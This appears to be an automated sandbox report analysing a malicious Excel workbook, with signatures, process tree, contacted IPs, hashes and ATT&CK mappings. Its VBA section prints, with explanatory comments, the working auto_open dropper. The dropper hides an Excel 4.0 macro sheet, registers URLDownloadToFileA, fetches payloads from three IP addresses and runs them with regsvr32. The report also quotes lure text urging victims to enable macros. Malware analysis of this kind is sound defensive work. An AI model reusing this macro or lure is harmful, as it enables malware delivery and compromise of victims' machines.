

Windows Analysis Report 1701667874-10042021.xls

Overview

General Information

Sample Name:1701667874-10042021.xls
Analysis ID:499734
MD5:1dc3a1c0972a9e32d88e85d1cf8f2c65
SHA1:808311a07522956f55bf842749083e199b0f04c6
SHA256:9828f899790d150360e0a3f78f3eb3b758417644bc16896aeb411e2af9e8ea4b
Tags:xlsxls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Sigma detected: Regsvr32 Command Line Without DLL
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2016 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2184 cmdline: regsvr32 -silent ..\Celod.wac MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1612 cmdline: regsvr32 -silent ..\Celod.wac1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2528 cmdline: regsvr32 -silent ..\Celod.wac2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: 1701667874-10042021.xls; Rule: JoeSecurity_HiddenMacro; Description: Yara detected hidden Macro 4.0 in Excel; Author: Joe Security

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: regsvr32 -silent ..\Celod.wac, CommandLine: regsvr32 -silent ..\Celod.wac, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2016, ProcessCommandLine: regsvr32 -silent ..\Celod.wac, ProcessId: 2184
    Sigma detected: Regsvr32 Command Line Without DLL
    Source: Process started; Author: Florian Roth; Data: Command: regsvr32 -silent ..\Celod.wac, CommandLine: regsvr32 -silent ..\Celod.wac, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2016, ProcessCommandLine: regsvr32 -silent ..\Celod.wac, ProcessId: 2184

    Jbx Signature Overview


    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Software Vulnerabilities:

    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 190.14.37.165:80
    Source: global traffic; TCP traffic: 192.168.2.22:49169 -> 5.196.247.11:80
    Source: global traffic; TCP traffic: 192.168.2.22:49171 -> 188.119.113.3:80
    Source: unknown; TCP traffic detected without corresponding DNS query: 190.14.37.165
    Source: unknown; TCP traffic detected without corresponding DNS query: 5.196.247.11
    Source: unknown; TCP traffic detected without corresponding DNS query: 188.119.113.3
    Source: 1701667874-10042021.xls; String found in binary or memory: http://188.119.113.3/
    Source: 1701667874-10042021.xls; String found in binary or memory: http://190.14.37.165/
    Source: 1701667874-10042021.xls; String found in binary or memory: http://5.196.247.11/
    Source: regsvr32.exe, 00000005.00000002.679858071.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.680607370.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.681304870.0000000001CE0000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Document image extraction number: 0; Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0; Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0; Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1; Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1; Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1; Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: 1701667874-10042021.xls; OLE, VBA macro line: Sub auto_close()
    Source: 1701667874-10042021.xls; OLE, VBA macro line: Sub auto_open()
    Source: 1701667874-10042021.xls; OLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: 1701667874-10042021.xls; OLE indicator, VBA macros: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRDAD3.tmp
    Source: C:\Windows\System32\regsvr32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 1701667874-10042021.xls; OLE indicator, Workbook stream: true
    Source: classification engine; Classification label: mal68.expl.winXLS@7/2@0/3
    Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Window found: window name: SysTabControl32
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match; File source: 1701667874-10042021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial Access: Valid Accounts; Default Accounts; Domain Accounts
    Execution: Scripting (2); Exploitation for Client Execution (21); At (Linux)
    Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
    Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows)
    Defense Evasion: Disable or Modify Tools (1); Process Injection (1); Scripting (2)
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
    Discovery: File and Directory Discovery (1); System Information Discovery (2); Query Registry
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
    Command and Control: Data Obfuscation; Junk Data; Steganography
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
    Impact: Modify System Partition; Device Lockout; Delete Device Data

    Behavior Graph


    Screenshots


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    http://190.14.37.165/: 4% (Virustotal); 0% (Avira URL Cloud: safe)
    http://188.119.113.3/: 4% (Virustotal); 0% (Avira URL Cloud: safe)
    http://5.196.247.11/: 4% (Virustotal); 0% (Avira URL Cloud: safe)
    http://servername/isapibackend.dll: 0% (Avira URL Cloud: safe)

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    http://190.14.37.165/
    Source: 1701667874-10042021.xls; Malicious: false; Reputation: unknown
    • 4%, Virustotal
    • Avira URL Cloud: safe
    http://188.119.113.3/
    Source: 1701667874-10042021.xls; Malicious: false; Reputation: unknown
    • 4%, Virustotal
    • Avira URL Cloud: safe
    http://5.196.247.11/
    Source: 1701667874-10042021.xls; Malicious: false; Reputation: unknown
    • 4%, Virustotal
    • Avira URL Cloud: safe
    http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000005.00000002.679858071.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.680607370.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.681304870.0000000001CE0000.00000002.00020000.sdmp; Malicious: false; Reputation: low
    • Avira URL Cloud: safe

    Contacted IPs


    Public

    5.196.247.11: domain unknown; country France; ASN 16276 (OVHFR); malicious: false
    190.14.37.165: domain unknown; country Panama; ASN 52469 (OffshoreRacksSAPA); malicious: false
    188.119.113.3: domain unknown; country Russian Federation; ASN 50673 (SERVERIUS-ASNL); malicious: false

    General Information

    Joe Sandbox Version:33.0.0 White Diamond
    Analysis ID:499734
    Start date:08.10.2021
    Start time:22:30:15
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 47s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:1701667874-10042021.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:9
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.expl.winXLS@7/2@0/3
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Changed system and user locale, location and keyboard layout to English - United States
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    Match: 5.196.247.11; Associated sample: 173536952-10042021.xls; Detection: malicious
    • 5.196.247.11/44473.7079048611.dat
    Match: 190.14.37.165; Associated sample: 173536952-10042021.xls; Detection: malicious
    • 190.14.37.165/44473.7079048611.dat
    Match: 188.119.113.3; Associated sample: 173536952-10042021.xls; Detection: malicious
    • 188.119.113.3/44473.7079048611.dat

    Domains

    No context

    ASN


    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):162688
    Entropy (8bit):4.254323210253177
    Encrypted:false
    SSDEEP:1536:C6aL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CbJNSc83tKBAvQVCgOtmXmLpLm4l
    MD5:CB869BE78123435D1424E8D46E109C0B
    SHA1:5F7F80EB1C733006623828551737BBB312563659
    SHA-256:3CBA343B556B4D7DD4331CB01FC4DD64992C53998D0A0FE392A9B53DEE015297
    SHA-512:3E8DD0FB16306A8507352DCC97744C5C5E3A2A7C9C894888F84CC715C9CE5045787E04F5398BA84C7096B64BB795267DF11FF60FC433398C6D687A27D7165C39
    Malicious:false
    Reputation:low
    C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):15676
    Entropy (8bit):4.532584445930937
    Encrypted:false
    SSDEEP:192:RllA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:RL8xesT20lheZ3waE5D7qxIxkxe
    MD5:76E42ECC749A94DE9640F3AB385B214E
    SHA1:ED8C80ACAA1AA06590770D3854B2BDF248AD6F15
    SHA-256:469812A4111C69521D0F8CF6103F9087F5EBE4D8976948C8E330622944A30D4E
    SHA-512:DB1BD45F231CAFFCC9FE75F5F955907CE0240C3777575DD48856E90D2D2024558690A1818BB33AE2FE4F1798535D73937547A68E6ECD05DF6B17C29D14CC822C
    Malicious:false
    Reputation:low

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Oct 4 09:34:12 2021, Security: 0
    Entropy (8bit):7.07736722605419
    TrID:
    • Microsoft Excel sheet (30009/1) 47.99%
    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
    File name:1701667874-10042021.xls
    File size:132608
    MD5:1dc3a1c0972a9e32d88e85d1cf8f2c65
    SHA1:808311a07522956f55bf842749083e199b0f04c6
    SHA256:9828f899790d150360e0a3f78f3eb3b758417644bc16896aeb411e2af9e8ea4b
    SHA512:9bd8112044f2ca4f11861a50773c4cd98ce69bb04f523c4168c35481431eb2347a4ecb0e5c806217fdb89a977283168236046ebbdc0d7e556456b6ed5ba575db
    SSDEEP:3072:Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAxc6YehWfGdtUHKGDbpmsii/+u6ssC06+:Sk3hOdsylKlgxopeiBNhZF+E+W2kdAxX

    File Icon

    Icon Hash:e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "1701667874-10042021.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Author:Test
    Last Saved By:Test
    Create Time:2015-06-05 18:17:20
    Last Saved Time:2021-10-04 08:34:12
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Company:
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:1048576

    Streams with VBA

    VBA File Name: UserForm2, Stream Size: -1
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2
    VBA File Name:UserForm2
    Stream Size:-1
    VBA Code
    Attribute VB_Name = "UserForm2"
    Attribute VB_Base = "0{86A322E3-3EAA-43BD-A15C-2E5BDAB20ADE}{6DC45358-AAC1-427A-8A44-4B339D5A54C8}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False
    VBA File Name: Module1, Stream Size: 1533
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module1
    VBA File Name:Module1
    Stream Size:1533
    VBA Code
    Attribute VB_Name = "Module1"

    ' Creates an Excel 4.0 (XLM) macro sheet named "Sheettt". auto_open in Module5
    ' fills it with formulas and hides it; this is what the "hidden Macro 4.0"
    ' Yara rule in this report matches on.
    Function jgfjgjfhfhf()
    Set Fera = Excel4IntlMacroSheets
    Fera.Add.Name = "Sheettt"
    End Function

    ' Runs when the workbook is closed: deletes the macro sheet (alerts suppressed)
    ' so the XLM payload is not left behind in the document.
    Sub auto_close()
    Application.ScreenUpdating = True
       Application.DisplayAlerts = False
       Sheets("Sheettt").Delete
       Application.DisplayAlerts = True
    End Sub
    VBA File Name: Module5, Stream Size: 3595
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module5
    VBA File Name:Module5
    Stream Size:3595
    VBA Code
    Attribute VB_Name = "Module5"

    ' Runs on document open. The VBA itself does almost nothing directly: it writes
    ' an Excel 4.0 macro into the hidden "Sheettt" sheet and runs it. Keywords such as
    ' REGISTER, EXEC, NOW, HALT and urlmon are assembled from fragments, and the
    ' URLs and the regsvr32 command line are read from UserForm2 label captions
    ' (not included in this report), so the macro text never appears as a whole
    ' string in the VBA stream.
    Sub auto_open()
    On Error Resume Next
    Trewasd = "R" & "E" & "G" & "I" & "STER"
    Drezden = "="
    Naret = "E" & "X" & "E" & "C"
    DUJSKFASD = UserForm2.Label5.Caption
    Application.ScreenUpdating = False
    jgfjgjfhfhf
    ' Hide the macro sheet and make its cell text white so the formulas are not visible.
    Sheets("Sheettt").Visible = False
    Sheets("Sheettt").Range("A1:M100").Font.Color = vbWhite

    ' H24:H26 hold three download URLs taken from form labels; the report found
    ' http://188.119.113.3/, http://190.14.37.165/ and http://5.196.247.11/ in the file.
    Sheets("Sheettt").Range("H24") = UserForm2.Label1.Caption
    Sheets("Sheettt").Range("H25") = UserForm2.Label3.Caption
    Sheets("Sheettt").Range("H26") = UserForm2.Label4.Caption

    ' K17&K18 form the remote file name "<NOW() serial>.dat", matching the
    ' "44473.7079048611.dat" paths seen in the Joe Sandbox context section.
    Sheets("Sheettt").Range("K17") = "=N" & "O" & "W()"
    Sheets("Sheettt").Range("K18") = ".d" & "a" & "t"

    ' H35: =HALT() terminates the XLM macro.
    Sheets("Sheettt").Range("H35") = "=" & "H" & "ALT()"
    ' I9:I12 are the REGISTER arguments: DLL name "urlMon", export name from the
    ' form caption (the report attributes it to URLDownloadToFileA), argument type
    ' string "JJCCBB", and the alias "Byukilos" the export is registered under.
    Sheets("Sheettt").Range("I9") = "u" & "R" & "l" & "M" & "o" & "n"
    Sheets("Sheettt").Range("I10") = UserForm2.Caption
    Sheets("Sheettt").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
    Sheets("Sheettt").Range("I12") = "Byukilos"
    ' G10:G12 are the local drop paths, seen in the process tree as regsvr32 arguments.
    Sheets("Sheettt").Range("G10") = "..\Celod.wac"
    Sheets("Sheettt").Range("G11") = "..\Celod.wac1"
    Sheets("Sheettt").Range("G12") = "..\Celod.wac2"
    ' I17:I19 are the three command lines to execute (Label5 caption, plus "1"/"2").
    Sheets("Sheettt").Range("I17") = DUJSKFASD
    Sheets("Sheettt").Range("I18") = DUJSKFASD & "1"
    Sheets("Sheettt").Range("I19") = DUJSKFASD & "2"
    ' H10:H12 call the registered alias once per URL, writing to G10:G12.
    Sheets("Sheettt").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
    Sheets("Sheettt").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
    Sheets("Sheettt").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
    ' H9: =REGISTER(...) ; H17:H19: =EXEC(...) for each command line.
    Sheets("Sheettt").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
    Sheets("Sheettt").Range("H17") = Drezden & Naret & "(I17)"
    Sheets("Sheettt").Range("H18") = Drezden & Naret & "(I18)"
    Sheets("Sheettt").Range("H19") = Drezden & Naret & "(I19)"

    ' Start XLM execution at H1; the macro engine proceeds down column H
    ' (REGISTER at H9, downloads at H10:H12, EXEC at H17:H19, HALT at H35).
    Application.Run Sheets("Sheettt").Range("H1")
    End Sub
    VBA File Name: Sheet1, Stream Size: 991
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
    VBA File Name:Sheet1
    Stream Size:991
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Sheet1"
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    VBA File Name: ThisWorkbook, Stream Size: 3459
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
    VBA File Name:ThisWorkbook
    Stream Size:3459
    Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 32 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 39 04 00 00 b1 0a 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "ThisWorkbook"
    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    Option Explicit
    Public Sub applyLogosToDashboard()
        On Error Resume Next
    Application.ScreenUpdating = False
    
    If Not Application.OperatingSystem Like "*Mac*" Then
    
        Sheets("Dashboard").Activate
        Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
        ActiveSheet.Shapes("Apple_Logo").Visible = False
        ActiveSheet.Shapes("Win_Logo").Visible = True
        ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
        ActiveSheet.Shapes("Button_Print_PDF").Visible = True
        ActiveSheet.Shapes("Button_Save_As").Visible = True
        ActiveSheet.Shapes("Button_Help").Visible = True
        ActiveSheet.Shapes("Button_Versions").Visible = True
        Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
    
    Else
    
        Sheets("Dashboard").Activate
        Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
        ActiveSheet.Shapes("Apple_Logo").Visible = True
        ActiveSheet.Shapes("Win_Logo").Visible = False
        ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
        ActiveSheet.Shapes("Button_Print_PDF").Visible = False
        ActiveSheet.Shapes("Button_Save_As").Visible = False
        Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
    
    End If
    
        Application.ScreenUpdating = True
    
    End Sub
    
    
    Private Sub asWorkbook_Activateas()
    
    End Sub
    
    Private Sub saWorkbook_Opensa()
        On Error Resume Next
    
    
    End Sub
    
    Private Sub ssaaInitWorkbookssaa()
    End Sub
    VBA File Name: UserForm2, Stream Size: 1182
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
    VBA File Name:UserForm2
    Stream Size:1182
    Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "UserForm2"
    Attribute VB_Base = "0{86A322E3-3EAA-43BD-A15C-2E5BDAB20ADE}{6DC45358-AAC1-427A-8A44-4B339D5A54C8}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False

    Streams

    Stream Path: \x1CompObj, File Type: data, Stream Size: 108
    General
    Stream Path:\x1CompObj
    File Type:data
    Stream Size:108
    Entropy:4.18849998853
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:244
    Entropy:2.65175227267
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
